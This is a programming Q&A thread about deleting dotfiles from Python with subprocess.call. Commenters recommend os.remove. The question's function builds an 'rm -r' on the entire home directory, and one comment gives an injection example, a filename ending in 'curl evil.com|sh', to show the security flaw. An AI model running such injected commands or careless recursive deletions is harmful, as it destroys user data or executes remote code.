# Python: How would I remove specified files using subprocess.call?

Tags: python, linux, function, subprocess, delete-file

Beginner programmer here. I am trying to use the following function to remove specified files:

```
import subprocess
import os.path
from pathlib import Path


# Assigns variables
home = str(Path.home())
home = home + '/'
dotfiles = (home + 'dotfiles')


# Defines the function that removes files from home
def removeFromHome():
    subprocess.call('rm -r ' + home)
    return
```

Here are the files I am trying to remove:

```
rm -rf \
    ~/.bash_profile \
    ~/.bashrc \
    ~/.profile \
    ~/.stignore \
    ~/.config/dunst \
    ~/.config/flameshot \
    ~/.config/i3 \
    ~/.config/i3status \
    ~/.config/kitty \
    ~/.config/nvim \
    ~/.config/picom
```

The block of code above is from a Bash script I wrote. I am basically trying to do almost this exact thing, except that it is in Python and I want to make it a bit more efficient and easy to add to.

What I planned to do with the function is the following:

```
removeFromHome + ' .bash_profile'
removeFromHome + ' .bashrc'
```

So on and so forth. As you could have probably guessed this didn't work. What can I do to achieve what the Bash script above could achieve?

Note: I am using Arch Linux.

Comment: Is using `subprocess` to execute `rm` instead of just directly removing the files with python important?

Comment: The ``+`` in strings merges the two, so you would want to use ``home = '~/' + home``.

Comment: why to use subprocess if you can use `os.remove(path)`

Comment: if you want to use it with function then `removeFromHome('.bash_profile')` and you have to get it in function `def removeFromHome(filename):`

Comment: maybe first use `print()` to see what you have in variables and what you will send to subprocess. Maybe you created command with wrong paths and it can't remove files which don't exist

Comment: This code has **serious** security problems. What happens if you want to delete a file called `hello.txt; curl evil.com|sh`?

Comment: ...if you _were_ going to use `subprocess.call` to delete a file (or directory, recursively), the safe way would be `subprocess.call(['rm', '-r', '--', filename])` -- no `shell=True`, and the filename needs to already have shell expansions performed (so no `~`).

Comment: @DavisYoshida Is there a way to directly remove files with Python? I am currently trying to make a dotfile manager.

Comment: @Score-6 wouldn't that equal to `~//home/johnny`? If I print just the first `home` variable, I get `/home/johnny`.

Comment: @LiterallyJohnny there is a way to remove files using ``os.remove(path)``.

Comment: @furas Isn't `os` deprecated? Even still, I am running a few other commands with `subprocess`. I think it makes sense to utilize `subprocess` rather than to split the task, when just one can do them both.

Comment: @CharlesDuffy yeah, I kinda figured it had some security problems. I'll continue working on it. It's obviously nowhere near finished.

Comment: @Score-6 I am aware of that, but I am doing it this way for a reason.

Comment: "for a reason" for what reason?

Comment: And please don't ping everyone, did you know if you leave a message i will notice

Comment: @LiterallyJohnny, `os.system()` is deprecated, `os` as a whole is not. Using `os.remove()` is absolutely an appropriate practice here.

Comment: @Score-6 the reason why I am using `subprocess` is because I am also having to use it something else in the program. I don't see a point of having an entirely different module just for removing files when I could use the one I was already using for it.

Comment: and I think the opposite - why to use `subprocess` if I can use `os.remove` specially designed for this job - and it should run function directly in system (without using other process), and use less resources. And if will be something wrong then it can raise error which I can catch. And it will be more readable. If I can do this with `subprocess` then why to waste time for loading `Python` - maybe better write all in `Bash` :)

Comment: Are you suggesting I write a script in a language I hardly even know? I can write super basic things like that Bash script I put in the post, but that's as far as my knowledge goes.

I'm more focused on learning Python than learning Bash right now.

Comment: Well, just use ``os.remove()``